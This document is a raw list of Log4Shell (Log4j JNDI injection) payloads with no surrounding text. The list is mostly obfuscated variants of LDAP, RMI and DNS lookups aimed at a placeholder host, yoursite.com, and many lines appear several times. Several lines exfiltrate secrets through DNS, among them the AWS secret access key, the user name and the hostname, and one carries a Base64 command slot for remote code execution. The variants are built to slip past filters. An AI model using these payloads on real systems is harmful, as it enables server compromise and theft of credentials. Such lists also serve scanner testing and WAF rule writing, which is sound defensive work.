${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${jndi:ldap://yoursite.com/a}
${jndi:rmi://yoursite.com}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${jndi:rmi://yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${jndi:dns://${hostName}.yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${jndi:dns://yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${${date:'j'}ndi:dns://yoursite.com:80/a}
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${jndi:ldap://${hostName}.yoursite.com/a}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${jndi:dns://yoursite.com:80/}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://yoursite.com:80/a}
${jndi:rmi://yoursite.com},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${jndi:ldap://yoursite.com/a}
${jndi:rmi://yoursite.com}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${jndi:rmi://yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${jndi:dns://${hostName}.yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com/
${jndi:dns://yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a},
${${date:'j'}ndi:dns://yoursite.com:80/a}
${jndi:ldap://yoursite.com[:]80/Basic/Command/Base64/%BASE64CMD%}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a},
${j${main:\k5:-Nd}i${spring:k5:-:}rmi://yoursite.com}
${jndi:ldap://${sys:java.vendor}.yoursite.com/a}
${${date:'j'}ndi:d${date:'n'}s://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a},
${${upper:j}ndi:${upper:l}${upper:d}a${upper:p}://yoursite.com:80/a}
${j${::-nD}i${::-:}ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.0.0.1#yoursite.com:80/a}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://yoursite.com:%PORT/a}
${j${loWer:Nd}i${uPper::}rmi://yoursite.com}
${j${EnV:K5:-nD}i:ldap://yoursite.com:80/a}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.yoursite.com} 
${jndi:ldap://${hostName}.yoursite.com/a}
${${date:'j'}ndi:ldap://127.1.1.1#yoursite.com:80/a}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}yoursite.com:80/a}
${jndi:ldap://${env:USER}.yoursite.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${date:'j'}ndi:ldap://yoursite.com:%PORT/a}
${${lower:${lower:jndi}}:${lower:rmi}://yoursite.com:80/a}
${jndi:dns://yoursite.com:80/}
${j${k8s:k5:-ND}i:ldap://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://yoursite.com:80/a}
${jn${env::-}di:l${env::-}da${env::-}p://127.1.1.1#yoursite.com:80/a}
${jndi:ldap://127.1.1.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:ldap://yoursite.com:80/a}
${jndi:rmi://yoursite.com},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//yoursite.com:80/a},
${jn${env::-}di:l${env::-}da${env::-}p://yoursite.com:%PORT/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}ap://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.1.1.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a}
${jndi:ldap://${env:JAVA_VERSION}.yoursite.com/a}
${j${k8s:k5:-ND}i${sd:k5:-:}dns://yoursite.com:80/a}
${j${loWer:Nd}i${uPper::}ldap://yoursite.com:%PORT/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${${date:'j'}ndi:ldap://127.0.0.1#yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://yoursite.com:80/a }
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://yoursite.com:80/a},
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//yoursite.com:80/a}
${jndi:ldap://yoursite.com/a}
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a},
${jndi:rmi://yoursite.com}
${jndi:ldap://yoursite.com/a}
${jndi:dns://${env:USERDOMAIN}.yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${jndi:rmi://yoursite.com}
${jndi:ldap://yoursite.com/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${jndi:rmi://yoursite.com}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//yoursite.com:80/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}dns://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1#yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${${::-j}ndi:dns://${env:USERNAME}.yoursite.com:80}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://yoursite.com/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${${lower:jndi}:${lower:rmi}://yoursite.com:80/a}
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.1.1.1#yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80},
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:ldap://${sys:java.version}.yoursite.com/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:rmi://yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1#yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${jndi:ldap://${env:user}.yoursite.com/a}
${jndi:rmi://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1#yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${jndi:rmi://yoursite.com:80/a}
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.0.0.1#yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${jndi:rmi://yoursite.com:80/a}
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://yoursite.com:80/a
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${${date:'j'}ndi:r${date:'m'}i://yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${jndi:dns://${env:COMPUTERNAME}.yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://1234.yoursite.com}
${jndi:dns://${hostName}.yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${${date:'j'}ndi:ld${date:'a'}p://127.1.1.1#yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${jndi:dns://${hostName}.yoursite.com:80/a}
${jn${env::-}di:r${env::-}m${env::-}i://yoursite.com:80/a}
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${jndi:dns://${hostName}.yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${jnd${upper:i}:ldap://yoursite.com:80/a},
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${jn${env::-}di:d${env::-}n${env::-}s://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.1.1.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${jndi:ldap://127.0.0.1#yoursite.com:80/a}
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${jndi:${lower:l}${lower:d}a${lower:p}://yoursite.com:80/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//yoursite.com:80/a},
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1#yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//127.0.0.1#yoursite.com:80/a}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://yoursite.com:80/a},
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://yoursite.com:80/a},
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}${::-n}${::-d}${::-I}:${::-d}${::-n}${::-s}://yoursite.com:80/a}
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${j${k8s:k5:-ND}i:ldap://127.0.0.1#yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
${${::-j}ndi:rmi://yoursite.com:80/a},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://yoursite.com:80/a}
${jn${date:}di${date:':'}dns://yoursite.com:80/a}
